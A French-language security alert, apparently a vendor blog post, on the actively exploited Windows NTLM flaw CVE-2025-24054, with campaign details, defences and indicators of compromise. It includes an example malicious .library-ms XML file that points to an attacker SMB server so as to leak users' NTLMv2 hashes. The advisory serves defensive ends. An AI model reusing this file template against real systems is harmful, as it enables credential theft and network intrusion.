Alerte Urgente : Vulnérabilité NTLM CVE-2025-24054 Activement Exploitée

Publié le 18 avril 2025

Introduction

Une grave vulnérabilité, CVE-2025-24054, menace les systèmes Windows en permettant la fuite de hachages NTLM à travers des fichiers malveillants. Depuis le 19 mars 2025, cette faille est activement exploitée, malgré un correctif publié par Microsoft le 11 mars 2025. Requiérant seulement une interaction minime, comme naviguer dans un dossier ou cliquer sur un fichier piégé, elle expose les utilisateurs à des risques majeurs, tels que le vol de mots de passe ou la compromission totale des réseaux.

NTLM : un Protocole à Double Tranchant

NTLM (New Technology LAN Manager) est un protocole d’authentification utilisé par Microsoft pour sécuriser les communications réseau. La version NTLMv2, plus robuste que NTLMv1, utilise des défis aléatoires pour générer des hachages uniques, réduisant les risques d’attaques comme le pass-the-hash. Cependant, un hachage NTLMv2 intercepté peut être craqué par force brute ou utilisé dans des attaques de relais (NTLM relay), permettant à un attaquant de s’authentifier sur d’autres services, surtout si les identifiants appartiennent à un utilisateur privilégié.

Zoom sur la CVE-2025-24054

La vulnérabilité CVE-2025-24054 exploite une faiblesse dans Windows Explorer, où un fichier .library-ms malveillant peut déclencher une connexion SMB vers un serveur contrôlé par l’attaquant. Cette connexion expose le hachage NTLMv2-SSP de l’utilisateur, souvent sans qu’il ait besoin d’ouvrir le fichier. Un simple clic droit ou une navigation dans le dossier suffit.

Exemple de Fichier Piégé

Voici un exemple de fichier .library-ms malveillant :

<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation>
        <url>\\\\172.16.254.99\\share</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>

Cette configuration force une connexion SMB, transmettant le hachage NTLMv2-SSP au serveur malveillant.

Vagues d’Attaques Observées

Campagne de Phishing (20-21 mars 2025)

Les 20 et 21 mars 2025, des attaques ont visé des organisations en Pologne et en Roumanie via des courriels de phishing. Ces courriels contenaient des liens Dropbox menant à une archive contenant plusieurs fichiers malveillants :

• Fichier .library-ms : Exploite CVE-2025-24054 pour voler les hachages NTLM dès l’extraction.
• Fichier .url : Lié à une autre vulnérabilité (CVE-2024-43451), il s’active via des actions comme un clic droit.
• Fichiers .website et .lnk : Redirigent vers un serveur malveillant à l’adresse 185.220.101.47.

Attaques sans Compression (25 mars 2025)

À partir du 25 mars, les attaquants ont distribué des fichiers .library-ms non archivés, rendant l’exploitation encore plus discrète. Une simple interaction avec le dossier contenant le fichier, hébergé sur un serveur comme 92.118.39.22, suffisait à exposer les hachages NTLMv2-SSP.

Conséquences Potentielles

Un hachage NTLMv2-SSP compromis peut permettre :

• Le craquage de mots de passe par force brute.
• Des attaques de relais pour accéder à d’autres systèmes.
• Une escalade des privilèges ou une compromission totale du domaine, surtout si les protections réseau sont faibles.

Mesures de Protection

1. Appliquez le correctif : Installez immédiatement la mise à jour de Microsoft du 11 mars 2025.
2. Passez à Kerberos : Remplacez NTLM par un protocole plus sécurisé.
3. Activez la signature SMB : Cela bloque les attaques de relais.
4. Formez vos utilisateurs : Apprenez-leur à repérer les courriels et fichiers suspects.
5. Surveillez le réseau : Bloquez les connexions SMB vers des serveurs externes inconnus.
6. Utilisez des outils de détection : Des solutions comme Check Point Threat Emulation peuvent neutraliser ces menaces.

Indicateurs de Compromission (IoC)

• Fichiers malveillants :
  • Archive : 9ca72d969d7c5494a30e996324c6c0fcb72ae1ae
  • xd.library-ms : 7dd0131dd4660be562bc869675772e58a1e3ac8e
  • xd.url : 76e93c97ffdb5adb509c966bca22e12c4508dcaa
• Serveurs malveillants :
  • 185.220.101.47
  • 92.118.39.22

Conclusion

L’exploitation fulgurante de CVE-2025-24054 montre à quel point les cybercriminels sont rapides à tirer parti des failles. Les organisations doivent agir vite : appliquer les correctifs, renforcer les configurations de sécurité et sensibiliser les utilisateurs. Face à des attaques toujours plus sournoises, une vigilance constante est essentielle pour protéger vos systèmes.

Ressources supplémentaires :

• Mise à jour Microsoft
• Analyse Technique

Inscrivez-vous à notre blog pour ne manquer aucune alerte cybersécurité et garder une longueur d’avance sur les menaces !